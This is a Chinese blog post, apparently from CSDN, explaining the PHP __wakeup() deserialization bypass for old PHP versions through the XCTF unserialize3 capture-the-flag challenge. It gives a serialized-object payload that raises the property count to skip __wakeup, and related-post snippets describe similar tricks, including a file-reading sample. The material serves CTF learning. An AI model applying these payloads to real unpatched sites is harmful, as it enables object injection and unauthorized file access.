__wakeup()绕过

原创已于 2022-10-06 19:18:06 修改 · 6.8k 阅读

12 ·

CC 4.0 BY-SA版权

文章标签：

#php

于 2022-04-23 17:58:07 首次发布

web知识专栏收录该内容

6 篇文章

订阅专栏

PHP5<5.6.25，PHP7 < 7.0.10

__wakeup函数是在php在使用反序列化函数unserialize()时，会自动调用的函数

如xctf-unserialize3

只要序列化的中的成员数大于实际成员数，即可绕过

如

<?php
class xctf
{
    public $flag = '111';

    public function __wakeup()
    {
        exit('bad requests');
    }
}
    $a=new xctf();
var_dump(serialize($a));

得到

string(36) "O:4:"xctf":1:{s:4:"flag";s:3:"111";}"

所以把成员数"1"，改为"2"即可绕过

payload：

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

绕过__wakeup()，得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

v2ish1yan

关注关注

5
点赞
踩
12

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

__wakeup绕过版本_PHP__wakeup()方法

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

08-29

1319

__wakeup函数是在php在使用反序列化函数unserialize()时，会自动调用的函数。只要序列化的中的成员数大于实际成员数，即可绕过

21-3 PHP反序列化漏洞-魔术方法绕过

weixin_43263566的博客

01-17

874

启动靶场 -> 在浏览器打开链接（这个靶场平台比较良心不用花钱，有些平台按分钟收钱，时间一到靶场不续费就自动关闭）先进行进行收集，根据页面提示网站备份，我们可以通过目录探测方式找到备份文件，并根据文件进行审计等后续操作，以达到读取flag文件的目的。在PHP中，__wakeup()是一个魔术方法，用于在反序列化对象时自动调用。来进行绕过，通过添加位置来改变类名的个数。或搜索： “[极客大挑战 2019]PHP”：指定排除的HTTP状态码，以逗号分隔。

参与评论您还未登录，请先登录后发表或查看评论

反序列化__wakeup()绕过

csjjjd的博客

01-24

1248

这里因为flag在flag.php但是我只要进行反序列化就会触发wake（）魔术方法，使file=index.php，这不是我们要的，所以必须绕过它，这里直接复制前面代码，把file改为flag.php，进行反序列化，得到正常的pop链，之后再把。后面的数字加个正号，然后把属性加一，接下来URL编码就可以绕过。但是限制很大，5

【PHP开发900个实用技巧】158.对象序列化： __sleep()和__wakeup()的用途！

最新发布

06-15

694

本文深入探讨了PHP对象序列化过程中的两个关键魔术方法：__sleep()和__wakeup()。文章首先解释了对象序列化的基本原理，即把对象转换为可存储或传输的字符串格式，以及反序列化即逆过程。接着，文章详细介绍了__sleep()方法，该方法在对象序列化前触发，允许开发者指定哪些属性应该被序列化，从而实现对象的轻量化，减少数据传输量。文章还讨论了__wakeup()方法，它在对象反序列化后立即执行，用于重建对象的运行环境。通过正确实现这两个魔术方法，可以避免序列化过程中的安全风险，如敏感数据泄露，并优

反序列化中_wakeup的绕过

rev1ve的博客

09-05

3172

反序列化中_wakeup扮演着非常重要的角色，ctf碰到很多的题目都有涉及到_wakeup绕过，写下这篇博客来总结下大部分绕过方法，其中会有例题具体演示。

绕过__wakeup() 反序列化合集

Jay17的博客

08-24

2003

绕过__wakeup() 反序列化合集

攻防世界-unserialize3_魔术函数，以及wakeup（）函数的绕过

Fisher

05-15

1470

拿到题目得到一段代码： class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化，将xctf类进行序列化，之后如果执行__wakeup()则会跳出，所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中，例如重新建立数据库连接，或执行其它初始化操作所以是将序列化的值反序列化之后执行，因此我们构造序列化的值先将类进行序列化： <?php

攻防世界_Web_php_unserialize（绕过php反序列/绕过wakeup函数/代码审计）

2401_87524087的博客

02-01

1427

preg_match() 函数用来匹配一个正则表达，匹配上了就返回true，上面代码正则匹配的是不区分大小写的o:数字或者是c:数字，用来干扰反序列化的unserialize() 函数用来反序列化字符串，将字符串反序列化成PHP代码。

Newstar week5 WEB Unserialize Again（phar反序列化，__wakeup()绕过，phar重签名）

2301_76690905的博客

11-10

610

newf = s + sha1(s).digest() + h # 对要签名的数据进行SHA-1哈希计算，并将原始数据、签名和类型/标识拼接成新的数据newf。//写文件，文件名是$pear，内容是$file。f = file.read() #打开名为1.phar的文件，以二进制只读模式读取文件内容，并将其存储到变量f中。在文件系统函数（file_exists()、is_dir()等）参数可控的情况下，配合phar://伪协议，可以。因为重新赋值修改了文件的内容，之前的签名就会无效，所以需要。

如果确认CONFIG_CPU_WAKEUP_WIFI_GPIO=12是被移除了，并且该配置的缺失会导致后续编译报错，如何解决？

03-23

3. **修改内核源码**：直接在内核源码中硬编码该GPIO值，或者通过设备树（Device Tree）进行配置，绕过Kconfig的设置。 4. **降级内核版本**：如果时间紧迫且其他方法不可行，暂时使用旧版本的内核，确保配置项存在...

极客大挑战 2019]PHP CVE-2016-7124 绕过__wakeup()

偷一个月亮

09-02

1079

极客大挑战 2019]PHP 扫描发现备份源代码www.zip 注意 private私有属性，不能从外面去更改访问只能从内部函数里面进行更改源代码如下： __wakeup()是被反序列后自动调用的函数。自动将属性改为guest但是和后面的admin有所冲突。 O:4:"Name":2:{s:14:"�Name�username";s:5:"admin";s:14:"�Name�password";...

PHP反序列化中如何绕过_wakeup()函数的一些技巧

m0_63138919的博客

08-28

1719

本文为魔术方法_wakeup()的一些绕过用法

绕过__wakeup，先执行外面的类&天翼杯的eval那个题的一个思考

Je3Z的博客

09-25

466

<?php class A{ public $code = ""; function __call($method,$args){ eval($this->code); } function __wakeup(){ $this->code = ""; } } class B{ function __destruct(){ .

CTF必看~ PHP反序列化漏洞6：绝妙_wakeup绕过技巧

Eason_LYC安全白帽子的成长博客

05-22

5020

_wakeup()是 PHP 中一个特殊的魔术方法。它在反序列化一个对象时被自动调用，允许开发者在对象从序列化格式还原为可用的 PHP 对象之前对其进行某些特殊处理。这个方法可以接受任意的参数，但在实际使用中，它通常不需要参数。

PHP反序列化--_wakeup()绕过

2302_79800344的博客

03-18

769

【代码】PHP反序列化--_wakeup()绕过。

ctf-php反序列化绕过__wakeup

qq_32445755的博客

05-19

2309

注意：PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法。所以在定义类方法时，除了上述魔术方法，建议不要以 __ 为前缀。 __wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在，则先会调用__wakeup()方法。部分代码 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 此时需要绕过__

反序列化之Wakeup方法绕过

lubai60060的博客

05-25

747

这里__wakeup（）的绕过方法还是很简单的，一般情况下不会单独出现。

php序列化绕过wakeup,PHP反序列化漏洞#XCTF题 : unserialize3#绕过wakeup()函数

weixin_42544461的博客

03-22

569

1.代码与结果代码如下：class xctf{public $flag='111';public function __wakeup(){exit('bad requests');}}$content = new xctf();echo serialize($content);?>结果如下：O:4:"xctf":1:{s:4:"flag";s:3:"111";}实验截图：2.相关姿势点2.1...

duwentao-[本地复现]-[__wakeup()魔术方法绕过]

qwsn

11-22

1642

0x01、Web 1.duwentao-[本地复现] 第一步：代码审计 <?php #error_reporting(0); //注释掉了关闭错误报告 class SoFun //类：SoFun { protected $file = 'index.php'; //保护属性：$file='index.php' public function __construct($file) //构造方法__construct()，在实例化当前类前，自动被调用，使用参数$f

ctf反序列化wakeup绕过

02-03

### CTF 中反序列化漏洞与 `__wakeup` 函数绕过技巧 #### 反序列化漏洞简介在网络安全领域，CTF（Capture The Flag）比赛中经常涉及反序列化漏洞的利用。这类漏洞源于应用程序信任并处理未经验证的数据流，在对象被重新创建的过程中可能引发恶意行为[^1]。 #### PHP中的反序列化机制对于PHP而言，当程序接收到表示先前保存状态的对象字符串时会触发反序列化进程。如果攻击者能够控制这个输入，则可以精心构造数据来操纵目标应用内部逻辑甚至执行任意代码[^2]。 #### 利用`__wakeup()`实现绕过的原理特别地，在某些情况下，开发者可能会定义特殊的方法如`__sleep()`和`__wakeup()`用于自定义序列化/反序列化的流程。后者会在每次成功恢复之前自动调用；因此成为了一个潜在的安全风险点——只要能影响到它的入参就有可能达成预期之外的效果[^3]。具体来说，假设存在如下场景： - 应用中有某个类实现了上述提到的一个或多个魔术方法； - 攻击面允许提交经过编码后的payload作为待解析的内容； - 关键在于找到一条从外部可控入口直达敏感操作之间的路径，并且其间没有任何有效的防护措施阻止这种交互的发生。此时就可以考虑构建特定结构体使得一旦完成加载就会立即激活预设好的指令链条，进而达到诸如泄露服务器端文件内容的目的[^5]。 ```php <?php class File { public $filename; public $filetype; function __construct($name, $type){ $this->filename=$name; $this->filetype=$type; } function __wakeup(){ if ($this->filetype === 'image/jpeg'){ echo "Normal operation"; }else{ // 这里可能存在危险的操作，比如读取其他文件 var_dump(readfile("php://filter/read=convert.base64-encode/resource={$this->filename}")); } } } ?> ``` 此段代码展示了如何通过设置不同的$filetype属性值来决定是否执行不安全的行为。实际环境中应当避免让此类条件判断依赖于用户提供的信息以防滥用。